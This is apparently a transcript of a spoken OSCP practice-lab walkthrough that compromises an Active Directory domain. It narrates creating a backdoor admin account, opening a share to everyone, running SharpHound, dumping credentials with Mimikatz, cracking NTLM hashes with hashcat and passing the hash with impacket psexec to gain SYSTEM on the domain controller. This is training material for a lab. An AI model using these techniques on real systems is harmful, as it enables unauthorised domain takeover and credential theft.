10.10.1.202 though. Okay, here we go. Try again. Fingers crossed. Please get it right. Yes. Okay, as soon as you see a window pop up, yeah. Okay, here we go. We are in. This is perfect. This is exactly what we wanted. And again, we now should be able to do some privilege escalation because theoretically we have the lapse password. So I'll immediately open up command prompt as Lucy. I'll say, who am I? Just so I can trigger alarms everywhere. I am OSCP Lucy. Who am I /all. Okay, so it says built-in administrators, but that's not right. So otherwise, well, that seems weird, but let's go ahead and try what we know to be true. So if I do net user, we should be able to see, oh yes, this is what we wanted to see. So net user ladmin. Boom. That's what we want right there. Let's go ahead and run as /user MS02/ladmin. We're going to run cmd.exe. Ooh, and fingers crossed. Let's go ahead and copy and paste. Hopefully that pasted. Yes! Wonderful. Who am I? ladmin. Fantastic. Net user ladmin is a member of the local administrators group. Perfect. Perfect. Okay. Well, that was a little weird. I just got kicked out. Hopefully that's not Lucy trying to take back over. Let's reconnect. Please, please, please reconnect. Let me in. Let me in. Okay. Not sure what happened, but we got booted out. But we did confirm that ladmin works. So let's try this then. Again, I want to start making my backdoor accounts, giving myself some ways to get back in. So let's run this command prompt as an admin this time. And it's going to pop up and say, okay, tell me who you are. Domain OSCP. Well, in this case, we actually want to use the ladmin account. So here's the secret here. You can type in either MS02 / and you'll notice it changes, or you could even type in a ./, which implies the local host. And ladmin. I don't know if we can copy and paste. Can we paste? Okay, this part might suck if I can't paste. Nobody wants to manually type that in. Oh, boo. Okay. All right. The power of magic and pausing, because it took me like probably 30 seconds to type that in. Let's see if I got it right. Sweet. Okay, I got it right. And again, who am I? I am ladmin. Who am I? /all. Oh, baby. There we go. All the privileges. All the privileges. All right. Next thing I'm going to do is my backdoor account. Net user /add backdoor and password 123. Is that what we were using? It was just password 123. I believe so. Yep. And let's see. Net local group administrators, add backdoor. Boom. Okay. Now, I guess at this point we need to figure out how we can get from here over to our over to our domain controller. I'm just trying to think, how do we want to do this? There's a few different ways. I guess one thing, since we're doing BloodHound on here, let's continue to enumerate. So the one thing BloodHound doesn't do, oh, and actually there's a great way to show this, is we're on MS02 right now. We tried to say, give me the shortest path to owned principals, or sorry, shortest path from owned principals to the domain admins, and it says, I don't have a way to get there. Okay. One of the reasons it might not is because it only knows about the information that was directly gathered, because we did this from a workstation from a user, a domain user. So while you can get a ton of information, you don't get everything. So if we go and look at, let's say, MS01, and then we click on MS01, it shows 0 sessions. Well, that's interesting. Oh, no, there we go. So 1 session now, and it shows minions is logged on. But we know that that's not true, because there was also the local user that was logged on there earlier, and that was Kevin. I believe it was Kevin. So this isn't 100% visibility, and I'm going to bet when we look at MS02, because we were on MS01, when we click on MS02, and even if we wait, there's 0 sessions on here. I'm going to, which means if there's any lateral movement or way that we could have gotten from MS01 onto MS02 and then MS02 up to DC, that data may not have been inside of BloodHound. So what I'm going to do, again, if you're short on time on the exam, you may decide to just jump ahead. However, for the sake of kind of reiterating some of the things of BloodHound and ways that you can add data, let's run this again. So in this case, I'm going to go back to MS01. Because I'm on here with admin privileges with my backdoor account, I can right click on this C drive users public folder, go to properties, sharing, advanced sharing. Because I'm a bad guy, I'm just going to share this to everybody, full control, apply, and so that way anybody and everybody can access it. And then same thing here for security. I'll go ahead and say, that doesn't see it on here, edit, add, and you can actually, there's one called everyone, but that doesn't exist in OSCP lab. So you hit location, hit cancel, and then now you can pick MS01. Because we don't have domain admin privileges, we can't enumerate Active Directory. And then here, there is an account, or a group I should say, called everyone. So add everyone. Full control. Oh my goodness. We just gave everyone full control. That's crazy. All right, so now we have a share, and you can confirm if you do / localhost, or even MS01, its own host name, you'll see there's public. So now that we did that, we can go back to our new victim, MS02. I'll go ahead and just kind of put this on top. Let's minimize that. And we can bring up a folder. We're logged on currently as Lucy, which is a domain user, which is technically everyone. You know, Lucy is a someone who's part of everyone. And we can go to MS01, and boom, there's our public share. Boom, now we can move data, and we can exfil data even if we want. But what we really are interested in is we're just going to grab the SharpHound.zip file, and let's take it back here to C drive users. And where do I like to put things? In public. Oh, since we're there. Oh, okay. Gru is also somebody logged on. Well, I'm already starting to see something I'm very interested in. Fingers crossed that's going to be our lateral movement. Let's go ahead and extract this. And let's open up a command prompt. And we're logged on as Lucy. So we don't even need to do a run as. This is perfectly fine. We're already a domain user, so we can enumerate the domain. We're going to run the same command we did earlier. So SharpHound, collect all, -- domain oscp.lab, and -- zip file name. We'll call this one sharp111 MS02. And we'll let that run. All right, and that finished. So now we can, as I mentioned, do some data exfil. We'll take our sharp file. We'll go ahead and move it on over back to that share. So MS01 public, and we'll drop it in there, which means now on MS01, we can go ahead and grab that zip file and then go back to our staging folder that we're doing on Kali and drop it in there. Boom. You just moved data from MS02 back to MS01 back to your Kali box. Just like that. Piece of cake. So now we'll go back here to BloodHound and we'll open up, and there's our MS02. Just drag and drop it on in. Boom, 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 boom. Get all of our data processed. And again, I'll go back and double check. Minions is still marked as owned. Nope, it's not. Okay, so this resets some of our data. So I'll right click, mark as owned. Actually, you know what? How about domain users? Again, ways you can look at things. Domain users, great. Here's our domain users, and if we look at direct members, boom. There's all of the direct members. We can see all the domain users, including Dr. Nefario, who right-click, mark as owned. Lucy, right-click, mark as owned. So when we imported this, we lost our markings. However, we have it now back. So fingers crossed, we'll go to analysis. Oh, actually, and the other thing we're interested in too is if we look at MS02, I'm curious. Sessions 1, Lucy. Okay, so it may not help us out because we can already tell that we have another potential user on there. But let's go to analysis. See if we can do shortest path to domain admins from owned principals. Domain admins, no data. Okay, so again, we're finding about shortest path from owned principals. Pick on Lucy. Can RDP into MS02. Yeah, we know that already. How about shortest path from owned principals and from Dr. Nefario? Nothing. Dr. Nefario doesn't really have much for permissions. Okay, so in this case, for the sake of time, the next thing I would do, or maybe even the first thing I would have done, is when I saw that there's another user on there. In this case, when we were on this machine, MS02, and we went to the users folder, and again, one of the first things you would be doing when you land on here is who am I? What are my permissions? So what are Lucy's permissions? What are some of the basic files? What are the other users on this machine? We would see here, oh, Gru has another user, or has a profile in here. So I'm very interested now to think, okay, does Gru have something that we can take advantage of? We'll have to do that as our LAdmin or a backdoor account. But next thing I would do then is take, well, what about Gru? Does Gru have anything special about him? So just for the sake of making it quick and easy, what if I marked Gru as owned? Let's say we find a way to own him, okay? Now, analysis, shortest path to domain admins from owned principals, domain admins. Oh, there it is. And actually, it's a very direct relationship. We could have enumerated this just by looking at Gru's memberships, because it says right here, Gru is a member of domain admins. He is a domain admin. So this kind of connects some of my dots I was thinking about here as we looked at this as well. When we looked at MS02 from BloodHound, it didn't see any sessions on here. Or it only saw the session of Lucy, who we used to pull this data. That's because we didn't have permissions to go and query more around MS02. Lucy's just a local user on there. So I'm curious, what if GRU left? What if there's, again, for the sake of time, if there's a way to get data off of here, to get GRU's credentials, let's hope it's maybe a cached credential. A couple ways we can do it. We've got Mimikatz, and we've also got our secrets dump. So my first go-to, usually just because I'm already here in the command line, is secrets dump. So let's run impacket. Dang it, if I can spell. Secrets dump. Now again, this makes a couple of assumptions that we have for permissions to do this over SMB, but the key here is that if we can run this, we'll get the cached credentials and see if there's anything like GRU's creds in there. Otherwise, my fallback would be Mimikatz. If you're more comfortable with Mimikatz, just copy it on over and run it locally. So this is going to be MS02 /backdoor at 10.10.1.202. And our password that we set, password 123. Oh, logon failure. Did I type that in wrong? Okay, well, again, if it fails, or even if I'm just typing it in wrong, it doesn't matter. We're going to go back over here. We're going to use our admin session here, and let's copy Mimikatz over. So we can go back to MS01, our stage or public folder. There's our Mimikatz executable, and then we can just drag and drop or take this back over to our users public folder here, paste, and then from our admin command prompt, we will go ahead and run. Oops, well, we'll go to C drive, users, public, Mimikatz. We'll say privilege, debug. We'll say log because we want to save this data. And my first one I'll typically run again is usually, actually it's sec URL, but in this case let's do it backwards. Let's do LSA, let's see, LSA dump, LSA/inject. And did we happen to get anything lucky there? Nope. All right, then in that case, we'll go ahead and go to sec URL sa. Logon passwords. Boom. Okay. And for the sake of making our lives a little bit easier, I will typically go ahead and open that here in Notepad, and then just do a quick find for username. And oh, there it is. There it is. Hello. Username GRU, domain OSCP, and our NTLM password. That's what we want. All right. This is gold. This is the domain admin that we were looking for. Okay, so let's go ahead and save this. And let's go ahead and see if we can actually crack this one. So nano, how about gru.hash? Actually, let's just add it to our hashes. See which of these that we can actually crack. So paste. Save. I'll do quick. I mean, we're going to do past the hash. Worst case, let's go ahead and clear our screen. Hashcat. And we'll run it against hashes. And let's use our word list. Share. Word lists. Rock you. Oh, we need to unpack that actually. So how about sudo tar xvf. I think Z. Might not be Z. All right, fine. You know what? Just use, when in doubt, use 7-zip. X. And then we'll just move rock U. I mean, I like to move it anyway and keep it where it should be. So that'll be user share word lists. So now again, let's go ahead and clear, and let's run hashcat against our hashes, user share word lists, rock U. And let's go ahead and get that running. Oh, it's going to ask us, okay, yep, which mode? This is an NTLM, so we're going to use mode 1000. And we'll go ahead and let that run. And at the same time, immediately what I want to do, though, I want to do it so bad, is just jump right into the domain controller as GRU. So a couple ways we can do it. Might as well show both. For this one, let's go ahead and open up a new tab. We'll come back and look at those passwords, but we can just play past the hash. So the first one I want to try is with xFreeRDP, which we've already been using for RDP access. I want to see if I can use that to RDP in, because let's stay on the RDP theme, right? In this case, instead of a P, it's going to be a PTH for pass the hash. Paste that in. Domain is now going to be OSCP. The user is GRU, and our target is now 10.10.1.200. All right, fingers crossed. What do you think? Think it's going to work? Think we can pass the hash for RDP? Oh, it's trying, but I'm not sure we're going to succeed. How's our passwords? Okay. 6 seconds, 0 passwords recovered. So again, for the OSCP exam, if you don't get any hits with the straight passwords from RockU, the next thing I would do is what? Add rules. So I believe in this case we can just add user share hashcat rules best64. And if you hit enter, it should confirm that our... Oh, no. Okay, so I did that wrong. It should be -R, I believe, for rules. The reason I can tell that is because it basically said, oh, we're also going to use the best64 rule base as a guest for words. So if we add -R, hit enter, here you can see the guest base as RockU, and the modification for those guesses, is rules and the best64 rule. And you'll also notice it takes longer. So if that doesn't work with our rule set, then yeah, it's generally going to be what I would consider not meant to be cracked within the OSCP time frame. All right, if we go back and look here, that timed out. You know what? Actually, I think it's because RDP is not enabled. So I think I'm trying an attack vector that's not even open. Let's confirm that real quick. Let's just do a sudo nmap -pn -v -p 3389 against 10.10.1.200. Okay, yep, that's why. Silly me. Shouldn't have even tried. What is open, however, is 445. Good old SMB. How are we going to abuse that? If you said impacket, you're correct. And if you said more specifically psexec, you were spot on. All right, impacket, psexec, and in this case, it's going to be OSCP /GRU. Although we don't even need the OSCP actually. We can just say GRU at 10.10.1.200. Oh, and we need to pass the hash though. So if we do impacket psexec --help, I believe it's going to be -hashes. And we can also add in, no, actually there's nothing else we need to add in. let's put this before. So dash hashes, and this will be the NT hash. So you'll notice it's got both formats here. Because we're just doing the NT hash, I believe you want to put a colon and then the hash, so that it represents there's no LM hash. We're only giving the NT hash. Ha. That's it. Who am I? I am system on DC01. We just owned this thing. We just owned it. And just for good measure, what I would like to do is go ahead and go into the C drive users administrator desktop. And if there was loot here, oh, not desktop, how about CD users, CD administrator, CD desktop. Actually, we could just do tree, see if there's any good. Ah, can't do that today. Okay, so in that case, desktop. Okay, so if I had created loot, boom. I mean, we're on the admin desktop. This is where proof.txt should be. You have just owned the Active Directory domain, so congratulations. Pat yourself on the back. Hopefully everything has made sense. I would say go back and practice doing this. Practice trying to do it without even having notes or reference material. And if you can do that, then you obviously have a very good familiarity with these tools and the methods and the ability to use them when appropriate. So with that, I'm going to go ahead and close things out. I'll say thank you again for following along. I hope you found this valuable and helpful. And I guess if there's continued interest, I might build some more.